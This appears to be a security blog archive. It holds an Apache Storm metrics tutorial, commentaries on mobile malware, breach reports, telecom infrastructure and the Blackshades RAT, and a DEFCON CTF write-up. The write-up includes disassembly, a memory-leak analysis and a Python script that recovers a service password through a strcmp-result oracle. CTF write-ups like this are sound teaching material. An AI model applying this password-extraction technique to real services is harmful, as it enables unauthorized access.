2014-01-05 09:25:59,825 5504334 1388931951 localhost:6702  9:exclaim2 execute_count 989
2014-01-05 09:25:59,831 5504340 1388931957 localhost:6704  7:exclaim1 execute_count 656
2014-01-05 09:26:29,821 5534330 1388931977 localhost:6704  7:exclaim1 word_count {bertels=435, jackson=402, nathan=405, mike=414, golda=451}
2014-01-05 09:26:29,821 5534330 1388931977 localhost:6704  7:exclaim1 word_length 5.790223065970574
2014-01-05 09:26:29,822 5534331 1388931982 localhost:6704 10:exclaim2 word_count {bertels!!!=920, golda!!!=919, jackson!!!=902, nathan!!!=907, mike!!!=921}
2014-01-05 09:26:29,823 5534332 1388931982 localhost:6704 10:exclaim2 word_length 8.794484569927775
2014-01-05 09:26:29,823 5534332 1388931986 localhost:6702  9:exclaim2 word_count {bertels!!!=737, golda!!!=751, jackson!!!=766, nathan!!!=763, mike!!!=715}
2014-01-05 09:26:29,823 5534332 1388931986 localhost:6702  9:exclaim2 word_length 8.818327974276528
2014-01-05 09:26:31,777 5536286 1388931991 localhost:6702  6:exclaim1 word_count {bertels=529, jackson=517, nathan=503, mike=498, golda=511}
2014-01-05 09:26:31,777 5536286 1388931991 localhost:6702  6:exclaim1 word_length 5.819781078967944
2014-01-05 09:26:32,454 5536963 1388931992 localhost:6704 10:exclaim2 execute_count 14
2014-01-05 09:26:49,829 5554338 1388932009 localhost:6703  8:exclaim1 execute_count 76
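If you want to post-process these entries, a small parser is enough. The sketch below is in Python rather than Java and assumes each entry consists of whitespace-separated columns in the order shown above: date, time, what looks like an elapsed-milliseconds column from the logger, epoch timestamp, host:port, taskId:component, metric name, and value. MetricEntry and parse_metric_line are hypothetical names, not part of Storm.

```python
from collections import namedtuple

# Field names are my own labels for the columns; "logger_ms" in particular
# is an assumption about what the third column means.
MetricEntry = namedtuple(
    "MetricEntry", "date time logger_ms timestamp host_port task name value"
)


def parse_metric_line(line):
    """Split one metrics.log entry into its eight columns.

    The value column is kept whole, so a word_count map such as
    "{a=1, b=2}" survives even though it contains spaces.
    """
    parts = line.split(None, 7)
    if len(parts) != 8:
        raise ValueError("unexpected metrics.log line: %r" % line)
    return MetricEntry(*(p.strip() for p in parts))


entry = parse_metric_line(
    "2014-01-05 09:25:34,809 5479318 1388931931 localhost:6702 "
    "9:exclaim2 execute_count 196"
)
print(entry.task, entry.name, entry.value)
```

Splitting at most seven times keeps the parser indifferent to whether the value is a single number or a whole map of counters.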

You should also see the LoggingMetricsConsumer show up as a Bolt in the Storm web UI, like this (After clicking the “Show System Stats” button at the bottom of the page):

Summary

  1. We instrumented the ExclamationBolt to collect some simple metrics. We accomplished this by initializing and registering the metrics in the Bolt’s prepare method and then by incrementing/updating the metrics in the bolt’s execute method.

  2. We had the metrics framework simply log all the metrics that were gathered using the built-in LoggingMetricsConsumer. The full code is here as well as posted below. A diff between the original ExclamationTopology and mine is here.

In a future post I hope to present a Statsd Metrics Consumer that I am working on to allow for easy collection of metrics in statsd and then visualization in graphite, like this.

package storm.starter;

import backtype.storm.Config;
import backtype.storm.LocalCluster;
import backtype.storm.StormSubmitter;
import backtype.storm.metric.LoggingMetricsConsumer;
import backtype.storm.metric.api.CountMetric;
import backtype.storm.metric.api.MeanReducer;
import backtype.storm.metric.api.MultiCountMetric;
import backtype.storm.metric.api.ReducedMetric;
import backtype.storm.task.OutputCollector;
import backtype.storm.task.TopologyContext;
import backtype.storm.testing.TestWordSpout;
import backtype.storm.topology.OutputFieldsDeclarer;
import backtype.storm.topology.TopologyBuilder;
import backtype.storm.topology.base.BaseRichBolt;
import backtype.storm.tuple.Fields;
import backtype.storm.tuple.Tuple;
import backtype.storm.tuple.Values;
import backtype.storm.utils.Utils;

import java.util.Map;

/**
 * This is a basic example of a Storm topology.
 */
public class ExclamationTopology {

  public static class ExclamationBolt extends BaseRichBolt {
    OutputCollector _collector;

    // Metrics
    // Note: these must be declared as transient since they are not Serializable
    transient CountMetric _countMetric;
    transient MultiCountMetric _wordCountMetric;
    transient ReducedMetric _wordLengthMeanMetric;

    @Override
    public void prepare(Map conf, TopologyContext context, OutputCollector collector) {
      _collector = collector;

      // Metrics must be initialized and registered in the prepare() method for bolts,
      // or the open() method for spouts.  Otherwise, an Exception will be thrown
      initMetrics(context);
    }

    void initMetrics(TopologyContext context) {
      _countMetric = new CountMetric();
      _wordCountMetric = new MultiCountMetric();
      _wordLengthMeanMetric = new ReducedMetric(new MeanReducer());

      context.registerMetric("execute_count", _countMetric, 5);
      context.registerMetric("word_count", _wordCountMetric, 60);
      context.registerMetric("word_length", _wordLengthMeanMetric, 60);
    }

    @Override
    public void execute(Tuple tuple) {
      _collector.emit(tuple, new Values(tuple.getString(0) + "!!!"));
      _collector.ack(tuple);
      updateMetrics(tuple.getString(0));
    }

    void updateMetrics(String word) {
      _countMetric.incr();
      _wordCountMetric.scope(word).incr();
      _wordLengthMeanMetric.update(word.length());
    }

    @Override
    public void declareOutputFields(OutputFieldsDeclarer declarer) {
      declarer.declare(new Fields("word"));
    }
  }

  public static void main(String[] args) throws Exception {
    TopologyBuilder builder = new TopologyBuilder();
    builder.setSpout("word", new TestWordSpout(), 10);
    builder.setBolt("exclaim1", new ExclamationBolt(), 3).shuffleGrouping("word");
    builder.setBolt("exclaim2", new ExclamationBolt(), 2).shuffleGrouping("exclaim1");

    Config conf = new Config();
    conf.setDebug(true);

    // This will simply log all Metrics received into $STORM_HOME/logs/metrics.log on one or more worker nodes.
    conf.registerMetricsConsumer(LoggingMetricsConsumer.class, 2);

    if (args != null && args.length > 0) {
      conf.setNumWorkers(3);
      StormSubmitter.submitTopology(args[0], conf, builder.createTopology());
    }
    else {
      LocalCluster cluster = new LocalCluster();
      cluster.submitTopology("test", conf, builder.createTopology());
      Utils.sleep(5 * 60 * 1000L);
      cluster.killTopology("test");
      cluster.shutdown();
    }
  }
}

Android Is Still the King of Mobile Malware


According to F-Secure’s “Q1 2014 Mobile Threat Report”, the Android operating system was the main target of 99% of new mobile malware in Q1 2014. The report states that between January 1 and March 31, F-Secure discovered 275 new malware threat families for Android, compared to just one for iOS and one for Symbian. In the same report from Q1 2013, F-Secure identified 149 malware threat families with 91% of them targeting Android. Not only are malware threats proliferating, but the amount of malware specifically targeting Android devices is also increasing.

It’s true that Android malware is becoming more advanced and harder to mitigate. But all the same, the numbers tell a bleak story for Android users. Why are there so many more malware threat families for Android than for iOS? The advantage iOS has over Android in terms of malware protection is Apple’s App Store, where all applications are vetted and tested before public release. This system has had a significant impact on preventing malware infections for iOS users. Since a large number of Android apps come from third-party sources, it’s more difficult for Google to monitor and control all of the Android apps being downloaded by consumers. As long as Android continues to allow users to download apps from third parties where “criminal developers” can distribute their applications, we’re likely to continue to see an increase in the number of Android malware threats. It will be interesting to see what F-Secure’s Q2 report brings.

Verizon's Data Breach Investigations Report: POS Intrusion Discovery


Verizon recently released its 2014 Data Breach Investigations Report. I could spend all day analyzing this, but I’ll touch on just one issue that’s been on many of our minds recently: Point-of-Sale (POS) intrusion.

Aside from Verizon’s assertion that the number of POS intrusions is actually declining (contrary to popular perception), I was most intrigued by the following statement: “Regardless of how large the victim organization was or which methods were used to steal payment card information, there is another commonality shared in 99% of the cases: someone else told the victim they had suffered a breach.”

What does that say for the wide array of network defense software currently deployed around the globe? An organization’s security posture is clearly flawed if the vast majority of compromises are discovered by outside parties (the report stated that law enforcement was the leading source of discovery for POS intrusions). It is especially troubling that even large organizations don’t spot intrusions, because they likely have the resources to purchase the best security tools available. Either companies aren’t prioritizing security, or the available tools are failing them.

The bottom line is that with all the network security tools out there, no one has shown much success at thwarting POS attacks in real time. If we assume the POS targets were PCI compliant, then they must have had, at a minimum, 12 security requirements from 6 control objectives (per the PCI Data Security Standard: Requirements and Security Assessment Procedures Version 3.0).

Despite these security measures being critical first lines of defense, in many situations they are not enough to thwart the most aggressive threats. Attackers were still able to enter the networks and extract sensitive consumer information. It seems likely that network defenders will continue to be unaware of nefarious acts taking place within their own networks until more intelligent network security solutions become the standard. Detection, analysis, and remediation need to happen in real time, rather than continuing to be a post-mortem affair.

DEFCON Capture the Flag Qualification Challenge #1


I constantly challenge myself to gain deeper knowledge in reverse engineering, vulnerability discovery, and exploit mitigations. By day, I channel this knowledge and passion into my job as a security researcher at Endgame. By night, I use these skills as a Capture the Flag code warrior. I partook in the DEFCON CTF qualification round this weekend to help sharpen these skills and keep up with the rapid changes in reverse engineering technology. DEFCON CTF qualifications are a fun, and sometimes frustrating, way to cultivate my skillset by solving challenges alongside my team, Samurai.

CTF Background

For those of you who aren’t familiar with a computer security CTF game, Wikipedia provides a simple explanation. The qualification round for the DEFCON CTF is run jeopardy style, while the actual game is an attack/defense model. Qualifications ran all weekend for 48 hours with no breaks. Since 2013 the contest has been run by volunteers belonging to a hacker club called the Legitimate Business Syndicate, which is made up in part of former Samurai members. They did a fantastic job with qualifications this year and ran a smooth game with almost no downtime, solid technical challenges, round-the-clock support and the obligatory good-natured heckling. As a fun exercise, let’s walk through an interesting problem from the game. All of the problems from the CTF game can be found here.

Problem Introduction

The first challenge was written by someone we’ll call Mr. G and was worth 2 points. Upon opening the challenge you are presented with the following text:

http://services.2014.shallweplayaga.me/shitsco_c8b1aa31679e945ee64bde1bdb19d035 is running at:

shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me:31337

Capture the flag.

Downloading the shitsco_c8b1aa31679e945ee64bde1bdb19d035 file and running the “file” command reveals:

user@ubuntu:~$ file shitsco
shitsco: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x8657c9bdf925b4864b09ce277be0f4d52dae33a6, stripped

This is an ELF file that we can assume will run on a Linux 32-bit OS. Symbols were stripped to make reverse engineering a bit more difficult. At least it is not statically linked. I generally like to run strings on a binary at this point to get a quick sense of what might be happening in the binary. Doing this shows several string APIs imported and text that looks to be indicative of a command prompt style interface. Let’s run the binary to confirm this:

user@ubuntu:~$ ./shitsco
Failed to open password file: No such file or directory

Ok, the program did not do what I expected. We will need to add a user shitsco and create a file in his home directory called password. I determined this by running:

shitsco@ubuntu:~$ sudo strace ./shitsco
open("/home/shitsco/password", O_RDONLY) = -1 ENOENT (No such file or directory)

We can see that the file /home/shitsco/password was opened for reading and that this failed (ENOENT) because the file did not exist. You should create this file without a newline on the end or you might have trouble later on. I discovered this through trial and error. After creating the file we get better results:

shitsco@ubuntu:~$ echo -n asdf > /home/shitsco/password
shitsco@ubuntu:~$ ./shitsco

[ASCII-art banner]

Welcome to Shitsco Internet Operating System (IOS)
For a command list, enter ?
$ ?
==========Available Commands==========
|enable                              |
|ping                                |
|tracert                             |
|?                                   |
|shell                               |
|set                                 |
|show                                |
|credits                             |
|quit                                |
======================================
Type ? followed by a command for more detailed information
$

This looks like fun. We have what looks to be a router prompt. Typically, the goal with these binary exploitation problems is to identify somewhere that user input causes the program to crash and then devise a way to make that input take control over the program and reveal a file called flag residing on the remote machine. At this point, I have two choices. I can play around with the input to see if I can get it to crash or I can dive into the reverse engineering. I opted to play around with the input and the first thing that caught my attention was the shell command!

Welcome to Shitsco Internet Operating System (IOS)
For a command list, enter ?
$ shell
bash-3.2$

No way, it couldn’t be that easy. Waiting 5 seconds produces:

Yeah, right.

Ok, let the taunting begin. We can ignore the shell command. Thanks for the laugh Mr. G. By playing with the command line interface, I found the command input length was limited to 80 characters with anything coming after 80 characters applying to the next command. The set and show commands looked interesting, but even adding 1000 variables of different lengths failed to produce any interesting behavior. Typically, I am looking for a way to crash the program at this point.

What really looked like the solution came from the enable command:

$ enable
Please enter a password: asdf
Authentication Successful
# ?
==========Available Commands==========
|enable                              |
|ping                                |
|tracert                             |
|?                                   |
|flag                                |
|shell                               |
|set                                 |
|show                                |
|credits                             |
|quit                                |
|disable                             |
======================================
Type ? followed by a command for more detailed information
# flag
The flag is: foobarbaz

The password for the enable prompt comes from the password file we created earlier. I also created a file in /home/shitsco/ called flag with the contents foobarbaz, which is now happily displayed on my console. The help (? command) after we enter “enabled mode” lists two extra commands: disable and flag. So, if I can get the enable password on the remote machine, then I can simply run the flag command and score points on the problem. Ok, we have a plan, but how to crack that password?

The “Enable” Password

To recover this password, the first option that comes to mind is brute force. This is usually an option of last resort in CTF competitions. Just think about what could happen to this poor service if 1000 people decided to brute force the challenge. Having an inaccessible service spoils the fun for others playing. It’s time to dive a bit deeper and see if there is anything else we could try.

I tried long passwords, passwords with format strings such as %s, empty passwords, and passwords with binary data. None of these produced any results. However, a password length of 5 caused a strange behavior:

$ enable
Please enter a password: AAAAA
Nope.  The password isn't AAAAAr▒@▒r▒▒ο`M_▒`▒▒▒t

Ok, that looks like we’re getting extra memory back. If we look at it as hex we see:

shitsco@ubuntu:~$ echo -e enable\\nAAAAA\\n | ./shitsco | xxd
0000220: 2020 5468 6520 7061 7373 776f 7264 2069    The password i
0000230: 736e 2774 2041 4141 4141 f07c b740 f47c  sn't AAAAA.|.@.|
0000240: b792 90c1 bf60 c204 0808 8d69 b760 c204  .....`.....i.`..
0000250: 08a0 297f b701 0a24 200a 3a20 496e 7661  ..)....$ .: Inva
0000260: 6c69 6420 636f 6d6d 616e 640a 2420       lid command.$

The bit that starts 0xf0 0x7c is the start of the memory disclosure. Looking a little further, we see 0x60 0xc2 0x04 0x08. This looks like it could be a little endian encoded pointer for 0x0804c260. This is pretty cool and all, but where is the password?
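As a quick sanity check on that reading, the four bytes can be decoded with Python's struct module. This is just a sketch of the conversion; the variable names are mine.

```python
import struct

# The four leaked bytes in the order they appear in the hex dump.
leaked = bytes([0x60, 0xC2, 0x04, 0x08])

# "<I" means: little-endian, unsigned 32-bit integer.
(pointer,) = struct.unpack("<I", leaked)
print(hex(pointer))  # 0x804c260
```

The decoded value lands close to the .data address 0804C270 that shows up in the disassembly's cross references, which is consistent with it being a pointer into the binary's own data section.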

I tried sending in all possible password lengths and it was always leaking the same amount of data. But the leak only worked if the password was more than 4 characters long. It’s time to turn to IDA Pro and focus in on the function for the enable command.

This is the disassembly for the function responsible for handling the enable command. It is easy to find with string cross references:

.text:08049230 enable proc near                ; DATA XREF: .data:0804C270o
.text:08049230
.text:08049230 dest   = dword ptr -4Ch
.text:08049230 src    = dword ptr -48h
.text:08049230 n      = dword ptr -44h
.text:08049230 term   = byte ptr -40h
.text:08049230 s2     = byte ptr -34h
.text:08049230 var_14 = dword ptr -14h
.text:08049230 cookie = dword ptr -10h
.text:08049230 arg_0  = dword ptr  4
.text:08049230
.text:08049230        push  esi
.text:08049231        push  ebx
.text:08049232        sub   esp, 44h
.text:08049235        mov   esi, [esp+4Ch+arg_0]
.text:08049239        mov   eax, large gs:14h
.text:0804923F        mov   [esp+4Ch+cookie], eax
.text:08049243        xor   eax, eax
.text:08049245        mov   eax, [esi]
.text:08049247        test  eax, eax
.text:08049249        jz    loc_80492D8
.text:0804924F        lea   ebx, [esp+4Ch+s2]
.text:08049253        mov   [esp+4Ch+n], 20h        ; n
.text:0804925B        mov   [esp+4Ch+src], eax      ; src
.text:0804925F        mov   [esp+4Ch+dest], ebx     ; dest
.text:08049262        call  _strncpy
.text:08049267
.text:08049267 loc_8049267:                    ; CODE XREF: enable+EDj
.text:08049267        mov   [esp+4Ch+src], ebx      ; s2
.text:0804926B        mov   [esp+4Ch+dest], offset password_mem ; s1
.text:08049272        call  _strcmp
.text:08049277        mov   [esp+4Ch+var_14], eax
.text:0804927B        mov   eax, [esp+4Ch+var_14]
.text:0804927F        test  eax, eax
.text:08049281        jz    short loc_80492B8
.text:08049283        mov   [esp+4Ch+n], ebx
.text:08049287        mov   [esp+4Ch+src], offset aNope_ThePasswo ; "Nope.  The password isn't %s\n"
.text:0804928F        mov   [esp+4Ch+dest], 1
.text:08049296        call  ___printf_chk
.text:0804929B
.text:0804929B loc_804929B:                    ; CODE XREF: enable+A5j
.text:0804929B        mov   [esp+4Ch+dest], esi
.text:0804929E        call  sub_8049090
.text:080492A3        mov   eax, [esp+4Ch+cookie]
.text:080492A7        xor   eax, large gs:14h
.text:080492AE        jnz   short loc_8049322
.text:080492B0        add   esp, 44h
.text:080492B3        pop   ebx
.text:080492B4        pop   esi
.text:080492B5        retn
.text:080492B5 ; ---------------------------------------------------------------------------
.text:080492B6        align 4
.text:080492B8
.text:080492B8 loc_80492B8:                    ; CODE XREF: enable+51j
.text:080492B8        mov   [esp+4Ch+dest], offset aAuthentication ; "Authentication Successful"
.text:080492BF        mov   ds:admin_privs, 1
.text:080492C9        mov   ds:prompt, 23h
.text:080492D0        call  _puts
.text:080492D5        jmp   short loc_804929B
.text:080492D5 ; ---------------------------------------------------------------------------
.text:080492D7        align 4
.text:080492D8
.text:080492D8 loc_80492D8:                    ; CODE XREF: enable+19j
.text:080492D8        mov   [esp+4Ch+src], offset aPleaseEnterAPa ; "Please enter a password: "
.text:080492E0        lea   ebx, [esp+4Ch+s2]
.text:080492E4        mov   [esp+4Ch+dest], 1
.text:080492EB        call  ___printf_chk
.text:080492F0        mov   eax, ds:stdout
.text:080492F5        mov   [esp+4Ch+dest], eax     ; stream
.text:080492F8        call  _fflush
.text:080492FD        mov   dword ptr [esp+4Ch+term], 0Ah ; term
.text:08049305        mov   [esp+4Ch+n], 20h        ; a3
.text:0804930D        mov   [esp+4Ch+src], ebx      ; a2
.text:08049311        mov   [esp+4Ch+dest], 0       ; fd
.text:08049318        call  read_n_until
.text:0804931D        jmp   loc_8049267
.text:08049322 ; ---------------------------------------------------------------------------
.text:08049322
.text:08049322 loc_8049322:                    ; CODE XREF: enable+7Ej
.text:08049322        call  ___stack_chk_fail
.text:08049322 enable endp

Here is the C decompiled version of the function that is a bit clearer:

int __cdecl enable(const char **a1)
{
  const char *v1; // ebx@2
  char s2[32]; // [sp+18h] [bp-34h]@2
  int v4; // [sp+38h] [bp-14h]@3
  int cookie[4]; // [sp+3Ch] [bp-10h]@1

  cookie[0] = *MK_FP(__GS__, 20);
  if ( *a1 )
  {
    v1 = s2;
    strncpy(s2, *a1, 32u);
  }
  else
  {
    v1 = s2;
    __printf_chk(1, "Please enter a password: ");
    fflush(stdout);
    read_n_until(0, (int)s2, 32, 10);
  }
  v4 = strcmp((const char *)password_mem, v1);
  if ( v4 )
  {
    __printf_chk(1, "Nope.  The password isn't %s\n", v1);
  }
  else
  {
    admin_privs = 1;
    prompt = '#';
    puts("Authentication Successful");
  }
  sub_8049090((void **)a1);
  return *MK_FP(__GS__, 20) ^ cookie[0];
}

I’ve labeled a few things here, like the local variables and the read_n_until function. Notice that s2 is the destination buffer for the password we enter. It also looks possible to run enable <password> and not get prompted for the password. That path results in a strncpy, while the prompting path reads the password with a call to read_n_until. Here is the interesting thing: when I tried the strncpy code path, I did not get the leak behavior:

$ enable
Please enter a password: AAAAA
Nope.  The password isn't AAAAA`x@dx▒▒▒`▒d▒`▒▒▒z
$ enable AAAAA
Nope.  The password isn't AAAAA
$

So, what is the difference? Let’s have a quick look at the strncpy man page, namely the bit that says “If the length of src is less than n, strncpy() writes additional null bytes to dest to ensure that a total of n bytes are written.” On the prompting code path, our string is not being null terminated but if we enter the password with the enable command it is null terminated. We can also see that the s2 variable on the stack is never initialized to 0. There is no memset call.
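The difference between the two paths can be modeled in a few lines of Python. This is a simulation under stated assumptions, not the binary's code: the frame contents are made up, and read_into is a hypothetical stand-in for a read that stores only the bytes it receives and never writes a terminator.

```python
def strncpy(dest, src, n):
    """Mimic C strncpy: copy up to n bytes of src, pad the rest with NULs."""
    data = src[:n]
    dest[:n] = data + b"\x00" * (n - len(data))


def read_into(dest, data, n):
    """Mimic a raw read: overwrite only the bytes received, no terminator."""
    data = data[:n]
    dest[:len(data)] = data


def c_string(buf):
    """Return what printf("%s") would print: everything before the first NUL."""
    return bytes(buf).split(b"\x00", 1)[0]


# A made-up stack frame: 32 bytes of stale data standing in for s2 (with one
# stray NUL early on), followed by a 4-byte little-endian var_14 holding 1.
stale = b"\x11\x22\x33\x44\x00" + b"\xaa" * 27 + b"\x01\x00\x00\x00"

frame_a = bytearray(stale)
frame_b = bytearray(stale)
strncpy(frame_a, b"AAAAA", 32)    # the "enable AAAAA" path
read_into(frame_b, b"AAAAA", 32)  # the prompting path

print(c_string(frame_a))          # only the password comes back
print(len(c_string(frame_b)))     # password, stale bytes, and var_14's low byte
```

In the strncpy case the padding NULs cut the string off right after the password. In the read case the password overwrites the stray NUL, so the string keeps going through the stale bytes and into the variable stored after the buffer.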

Still we don’t have the password. It doesn’t exist in the leaked data. Leaks are very useful in exploitation as a defeat to ASLR. We might have enough information here to recover base addresses of the stack or libc. However, the path we are on to get the flag does not involve taking advantage of memory corruption. Is there anything in this leak that could give us something useful?

To answer this question let’s look at the stack layout and what is actually getting printed back to us:

.text:08049230 dest   = dword ptr -4Ch
.text:08049230 src    = dword ptr -48h
.text:08049230 n      = dword ptr -44h
.text:08049230 term   = byte ptr -40h
.text:08049230 s2     = byte ptr -34h
.text:08049230 var_14 = dword ptr -14h
.text:08049230 cookie = dword ptr -10h
.text:08049230 arg_0  = dword ptr  4
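The offsets in this layout tell us how the locals sit relative to each other. A quick bit of arithmetic, sketched in Python with constant names of my own choosing, shows that s2 spans 32 bytes and that var_14 begins immediately after it:

```python
# Frame offsets copied from the IDA listing.
S2_OFFSET = -0x34      # s2     = byte ptr -34h
VAR_14_OFFSET = -0x14  # var_14 = dword ptr -14h
COOKIE_OFFSET = -0x10  # cookie = dword ptr -10h

s2_size = VAR_14_OFFSET - S2_OFFSET          # bytes from the start of s2 to var_14
var_14_size = COOKIE_OFFSET - VAR_14_OFFSET  # bytes from var_14 to the cookie

print(s2_size, var_14_size)  # 32 4
```

So a string that fills all 32 bytes of s2 without a terminator runs straight into var_14, whose first byte is the 33rd byte printed.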

Therefore, if we are copying into s2 and we only leak data after the 4th character, we can assume that by default in the uninitialized stack there is a null at s2[3]. Overwriting this with user data causes our string to not terminate until we run into a null later on up the stack. What is var_14?

v4 = strcmp((const char *)password_mem, v1);

It turns out that var_14 (or v4) is the return from strcmp. Hmm. Here is what the man page has to say about that: “The strcmp() and strncmp() functions return an integer less than, equal to, or greater than zero if s1 (or the first n bytes thereof) is found, respectively, to be less than, to match, or be greater than s2.” What this means is that we can tell if our input string is less than or greater than the password on the remote machine. Let’s try it locally first. Our password locally is “asdf”. Let’s see if we can divine the first character using this method. The var_14 variable should be the 33rd character we get back:

shitsco@ubuntu:~$ python -c "import sys;sys.stdout.write('enable\n' + ' '*80 + '\n')" | ./shitsco | xxd
0000210: 2070 6173 7377 6f72 643a 204e 6f70 652e   password: Nope.
0000220: 2020 5468 6520 7061 7373 776f 7264 2069    The password i
0000230: 736e 2774 2020 2020 2020 2020 2020 2020  sn't
0000240: 2020 2020 2020 2020 2020 2020 2020 2020
0000250: 2020 2020 2001 0a24 200a 2020 2020 2020       ..$ .

I picked the space character for our password because space (0x20) is the lowest-valued printable character in the ASCII table. In the dump, the byte immediately after our 32 spaces (at offset 0x255) is 0x01; that is the low byte of var_14, and the null after the 0x01 is implied. Now, what happens if we set this to ‘a’ + 79 spaces?

shitsco@ubuntu:~$ python -c "import sys;sys.stdout.write('enable\na' + ' '*79 + '\n')" | ./shitsco | xxd
0000220: 2020 5468 6520 7061 7373 776f 7264 2069    The password i
0000230: 736e 2774 2061 2020 2020 2020 2020 2020  sn't a
0000240: 2020 2020 2020 2020 2020 2020 2020 2020
0000250: 2020 2020 2001 0a24 200a 2020 2020 2020       ..$ .
0000260: 2020 2020 2020 2020 2020 2020 2020 2020

Remember, that ‘a’ was actually the first character of our password locally and we still got a 0x1 back. How about ‘b’?

shitsco@ubuntu:~$ python -c "import sys;sys.stdout.write('enable\nb' + ' '*79 + '\n')" | ./shitsco | xxd
0000220: 2020 5468 6520 7061 7373 776f 7264 2069    The password i
0000230: 736e 2774 2062 2020 2020 2020 2020 2020  sn't b
0000240: 2020 2020 2020 2020 2020 2020 2020 2020
0000250: 2020 2020 20ff ffff ff0a 2420 0a20 2020       .....$ .
0000260: 2020 2020 2020 2020 2020 2020 2020 2020

Bingo. Here we have a value of 0xffffffff for var_14. Therefore, we know that the string we sent in is numerically higher than the actual password. The last character we tried, ‘a’, was still giving us back 0x01. When we see the value of var_14 change to -1 we know that the correct character was not the most recent attempt but the one prior to it. We can send all characters sequentially until we find the password.
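To make the idea concrete without a live target, here is a minimal offline sketch in Python 3. It is not the script used during the game: strcmp_sign is a hypothetical stand-in for the leaked var_14 value, and recover, ALPHABET, and the padding width are names and values I made up for illustration. It assumes the secret only contains characters that sort above the space used for padding.

```python
import string

# Assumption: the secret only uses these characters, all of which sort above
# the space (0x20) used as padding.
ALPHABET = (string.ascii_letters + string.digits + string.punctuation).encode()


def strcmp_sign(secret: bytes, guess: bytes) -> int:
    """Hypothetical oracle: the sign of strcmp(secret, guess)."""
    a, b = secret + b"\x00", guess + b"\x00"
    for x, y in zip(a, b):
        if x != y:
            return 1 if x > y else -1
        if x == 0:
            break
    return 0


def recover(oracle, alphabet: bytes = ALPHABET, pad: bytes = b" ",
            width: int = 30, max_len: int = 64) -> bytes:
    """Recover the secret one character at a time from the comparison sign."""
    if oracle(b"") == 0:
        return b""
    chars = sorted(set(alphabet))          # ascending byte values
    known = b""
    for _ in range(max_len):
        prev = chars[0]
        for c in chars:
            guess = known + bytes([c]) + pad * (width - len(known) - 1)
            if oracle(guess) < 0:          # the guess now sorts above the secret
                # Either c is the final character of the secret, or the
                # previous candidate was the right one and more follow.
                if oracle(known + bytes([c])) == 0:
                    return known + bytes([c])
                break
            prev = c
        known += bytes([prev])
    raise ValueError("gave up: secret too long or outside the alphabet")


if __name__ == "__main__":
    print(recover(lambda g: strcmp_sign(b"asdf", g)))
```

The exact-match probe when the sign flips handles the last character, where the padded guess already sorts above the secret because the secret has ended.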

Automation

The password used on the remote server is probably short enough that we could disclose it by hand. However, as a general rule in life, if I have to do something more than a few times I almost always save time by writing a quick python script to automate. Since we are going to be running this on a remote target I’ve set the server to run over a TCP port with some fancy piping over a fifo pipe.

shitsco@ubuntu:~$ mkfifo pipe
shitsco@ubuntu:~$ nc -l 31337 < pipe | ./shitsco > pipe

Here is a python script that will discover the password used. I’ve changed the password file on my local system to the one that was used during the game:

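# Python 2 script, as written for the game
import socket
import string
import sys

s = socket.socket()
s.connect(("192.168.1.151", 31337))
s.recv(1024)

def try_pass(passwd):
    # Send one "enable" attempt and return the leaked strcmp byte,
    # or "!" if the password was accepted.
    s.send("enable\n")
    s.recv(1024)
    s.send(passwd + "\n")
    ret = s.recv(1024)
    if ret.find("Authentication Successful") != -1:
        return "!"
    return ret[ret.find("$") - 2]

# Candidate characters in ascending order
chars = []
for x in string.printable:
    chars.append(x)
chars.sort()

known = ""
while 1:
    prev = chars[0]
    for x in chars:
        # Pad with spaces so the leaked value lands in the output
        i = try_pass(known + x + " " * (30 - len(known)))
        if ord(i) == 0xff:
            # We just went past the real character; keep the previous one
            known += prev
            break
        prev = x
    # Check whether x itself was the final character of the password
    i = try_pass(known[:-1] + x + "\x00")
    if i == '!':
        print "Enable password is: %s" % (known[:-1] + x)
        sys.exit()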

Running the script produces the output:

$ python shitsco.py
Enable password is: bruT3m3hard3rb4by

Excellent, let’s connect to the service with netcat and retrieve the flag:

$ nc shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me 31337
[ASCII-art banner omitted]
Welcome to Shitsco Internet Operating System (IOS)
For a command list, enter ?
$ enable bruT3m3hard3rb4by
Authentication Successful
# flag
The flag is: 14424ff8673ad039b32cfd756989be12

All that’s left to do is submit the flag and score points!

I’ll be posting another challenge and solution from the CTF soon, so if you found this one interesting, be sure to check back for more.

Telecom as Critical Infrastructure: Looking Beyond the Cyber Threat

Much of the discussion around cyber security of critical infrastructure focuses on the debilitating impact of a cyber attack on a country’s energy, economic, and transportation backbone. But Russia’s recent actions suggest an elevation of telecommunications as the most critical of all infrastructures—and the one it deems most worthy of protecting, not only because of the risks it may face, but also because of its potential as a mechanism for advancing national interests.

In March 2014, cyber attacks between Russia and Ukraine began when unknown hackers attacked Russian central bank and foreign ministry websites, and Ukrainian government websites were hit by an onslaught of 42 attacks during the Crimean vote for secession. Amid this back-and-forth volley of cyber attacks, Russia has quickly and quietly invested almost $25 million to provide Internet and telecom infrastructure in Crimea by deploying a fiber-optic submarine telecom link between the mainland and its newest territory. Rather than focusing on switching water, transportation, or electricity to Russian infrastructure, it has prioritized the establishment of telecommunications networks, turning this critical infrastructure into a tactic in and of itself.

By owning the telecom connections into Crimea, Russia ensures security for its communications there and eliminates Ukrainian disruptions. Russia’s telecom investments suggest that in the 21st century, national priorities in times of conflict have been reorganized around the assurance of secure telecommunications even before the assurance of traditional critical infrastructure security.

The threats to critical infrastructure are real and significant, but this prioritization of telecommunications as a tool of international relations suggests that we should pay attention not only to the cyber security risks to critical infrastructure, but also to how countries are using this very infrastructure as a tactic during times of conflict.

Blackshades: Why We Should Care About Old Malware

“Blackshades is so 2012” was more or less the response I received when I mentioned the recent FBI takedown of almost 100 Blackshades RAT dealers to a friend. This nonchalant, almost apathetic attitude towards older malware struck a nerve with me, since I’ve known network defenders and incident responders with the same sentiment. If the malware isn’t fresh, or if it’s perceived as old, they don’t want any part of it. While that attitude isn’t necessarily the norm, it does serve as a reminder that malware never truly dies–it just keeps on compromising. In fact, more than a half million computers in over 100 countries were reportedly recently infected by the Blackshades malware.

The FBI arrests are indicative of the omnipresence of malware even after it has been identified. In addition to the arrests, the FBI seized more than 1,900 domains used by Blackshades users to control their victims’ computers. Despite these seizures, countless systems from around the globe continue to attempt connections with their respective Blackshades Command and Control (CnC) domains. And there’s really no telling how many people have a copy of the RAT. Blackshades has been around for a while, and with a sales price of $40, it’s also quite affordable–not to mention the fact that the source code was leaked in 2010. It seems likely that there are a number of Blackshades RAT controllers still at large.

